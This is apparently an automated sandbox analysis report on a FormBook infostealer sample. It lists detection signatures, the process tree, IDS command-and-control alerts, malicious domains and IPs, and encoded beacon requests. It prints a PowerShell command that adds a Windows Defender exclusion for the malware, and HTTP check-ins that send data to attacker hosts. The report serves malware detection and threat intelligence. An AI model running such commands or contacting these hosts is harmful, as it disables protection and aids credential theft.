

Windows Analysis Report
SW_48912.scr.exe

Overview

General Information

Sample name: SW_48912.scr.exe
Analysis ID: 1580361
MD5: b4c5a379d38312666805d0d33e2801b7
SHA1: 562aeee42c55410fbc2935cc9879236390ee8944
SHA256: 77bd5b8fde14dc292c27e9526ee5c4d33b557d936deae82fa7abb3e768a74c3b
Tags: exe, scr, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SW_48912.scr.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\SW_48912.scr.exe" MD5: B4C5A379D38312666805D0D33E2801B7)
    • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4108 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • SW_48912.scr.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\SW_48912.scr.exe" MD5: B4C5A379D38312666805D0D33E2801B7)
      • kygSlzwdnMXWUy.exe (PID: 5296 cmdline: "C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 2812 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • kygSlzwdnMXWUy.exe (PID: 1228 cmdline: "C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches on memory dumps:

Source | Rule | Description | Author | Strings
00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(4 further memory-dump entries not shown in this export)

Yara matches on unpacked PE files:

Source | Rule | Description | Author | Strings
5.2.SW_48912.scr.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.SW_48912.scr.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_48912.scr.exe", ParentImage: C:\Users\user\Desktop\SW_48912.scr.exe, ParentProcessId: 7084, ParentProcessName: SW_48912.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", ProcessId: 3084, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_48912.scr.exe", ParentImage: C:\Users\user\Desktop\SW_48912.scr.exe, ParentProcessId: 7084, ParentProcessName: SW_48912.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", ProcessId: 3084, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_48912.scr.exe", ParentImage: C:\Users\user\Desktop\SW_48912.scr.exe, ParentProcessId: 7084, ParentProcessName: SW_48912.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", ProcessId: 3084, ProcessName: powershell.exe
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T11:36:03.324390+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 104.21.10.26 | 80 | TCP
2024-12-24T11:36:28.480173+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49781 | 45.41.206.57 | 80 | TCP
2024-12-24T11:36:43.245455+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49820 | 199.59.243.227 | 80 | TCP
2024-12-24T11:36:58.016186+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49857 | 162.0.236.169 | 80 | TCP
2024-12-24T11:37:13.072050+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49896 | 199.59.243.227 | 80 | TCP
2024-12-24T11:37:27.821198+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49933 | 199.59.243.227 | 80 | TCP
2024-12-24T11:37:43.688311+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49971 | 47.83.1.90 | 80 | TCP
2024-12-24T11:37:59.023203+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 104.21.80.1 | 80 | TCP
2024-12-24T11:38:14.539915+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50041 | 85.159.66.93 | 80 | TCP
2024-12-24T11:36:26.211792+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.4 | 49775 | 45.41.206.57 | 80 | TCP


                AV Detection

Source: SW_48912.scr.exe; ReversingLabs: Detection: 42%
Source: Yara match; File source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: SW_48912.scr.exe; Joe Sandbox ML: detected
Source: SW_48912.scr.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: SW_48912.scr.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sdchange.pdbGCTL; source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: kygSlzwdnMXWUy.exe, 00000009.00000000.1963179384.000000000070E000.00000002.00000001.01000000.0000000D.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3538501337.000000000070E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP; source: SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: SW_48912.scr.exe, SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sdchange.pdb; source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\sdchange.exe; Code function: 10_2_0271C3C0 FindFirstFileW,FindNextFileW,FindClose; 10_2_0271C3C0
Source: C:\Windows\SysWOW64\sdchange.exe; Code function: 4x nop then xor eax, eax; 10_2_02709E20
Source: C:\Windows\SysWOW64\sdchange.exe; Code function: 4x nop then mov ebx, 00000004h; 10_2_045704EE

                Networking

Source: Network traffic; Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49775 -> 45.41.206.57:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 104.21.10.26:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49820 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49781 -> 45.41.206.57:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49857 -> 162.0.236.169:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49933 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49971 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 104.21.80.1:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50041 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49896 -> 199.59.243.227:80
                Source: DNS query: www.letsbookcruise.xyz
                Source: DNS query: www.letsbookcruise.xyz
Source: Joe Sandbox View; IP Address: 199.59.243.227
Source: Joe Sandbox View; IP Address: 85.159.66.93
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: WEB2OBJECTSUS
Source: Joe Sandbox View; ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: global traffic; HTTP traffic detected: GET /xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.bgezakofe.shop | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.techstarllc.cloud | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.hokasportshoes.shop | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.primetream.live | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.sorket.tech | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.1337street.shop | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.cruycq.info | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.dejikenkyu.cyou | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected: GET /uwne/?APatc2S=vL36CH4RwprLmNwp4Gj6N9R+COmNcwDQlAQSHXNI75nLvOBtYNcxpRKkkR/hR1fY7vPFiFbrOB3asJH5t0/H0b+173/mnxpr58pFYDtgi19qUSBoNlsW/NI=&3FNHL=wVCtFrFXof HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.letsbookcruise.xyz | Connection: close | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Source: global traffic; DNS traffic detected: DNS query: www.bgezakofe.shop
Source: global traffic; DNS traffic detected: DNS query: www.techstarllc.cloud
Source: global traffic; DNS traffic detected: DNS query: www.hokasportshoes.shop
Source: global traffic; DNS traffic detected: DNS query: www.primetream.live
Source: global traffic; DNS traffic detected: DNS query: www.sorket.tech
Source: global traffic; DNS traffic detected: DNS query: www.1337street.shop
Source: global traffic; DNS traffic detected: DNS query: www.cruycq.info
Source: global traffic; DNS traffic detected: DNS query: www.dejikenkyu.cyou
Source: global traffic; DNS traffic detected: DNS query: www.letsbookcruise.xyz
Source: global traffic; DNS traffic detected: DNS query: www.stoauto.pro
Source: unknown; HTTP traffic detected: POST /phws/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.techstarllc.cloud | Origin: http://www.techstarllc.cloud | Referer: http://www.techstarllc.cloud/phws/ | Connection: close | Content-Length: 204 | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16 | Data Ascii: APatc2S=le1YadmxbCyL9+v4UEdG1C8myiZlxRVmujD4ybEENxOW5W+oaIthXIj93gW2PI8jvPkWh1JTKeY5FLPje6HjzJ0jWbzIQbyHP6Fcv2MREFzp0Y8f+jEaD+JqHLxd0fnaKYRJJask24Xw0JQ6G/+Odfujlx2Hk5sawKQUgkNjlk6Nnig7QpM3IzJ3WJYfOS8FpQ==
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 10:36:03 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsQ0gaNf%2Fa1z2bvPwVStYfp19GJV5vM5uN6w3rQk08xy970kOa45GktnFXKL9h2dkmjmuHCMGVIej2lkjTXl9S149uKjFMJjqKjbkjIoU8Gew6RS2eOfA9HLxY9XuF%2BqonNmLDg%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f6ff2b71d3c18f6-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1630&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 24 Dec 2024 10:36:20 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 24 Dec 2024 10:36:23 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 24 Dec 2024 10:36:28 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 10:36:49 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 10:36:52 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 10:36:55 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Dec 2024 10:36:57 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 24 Dec 2024 10:38:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-24T10:38:19.3234688Z
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
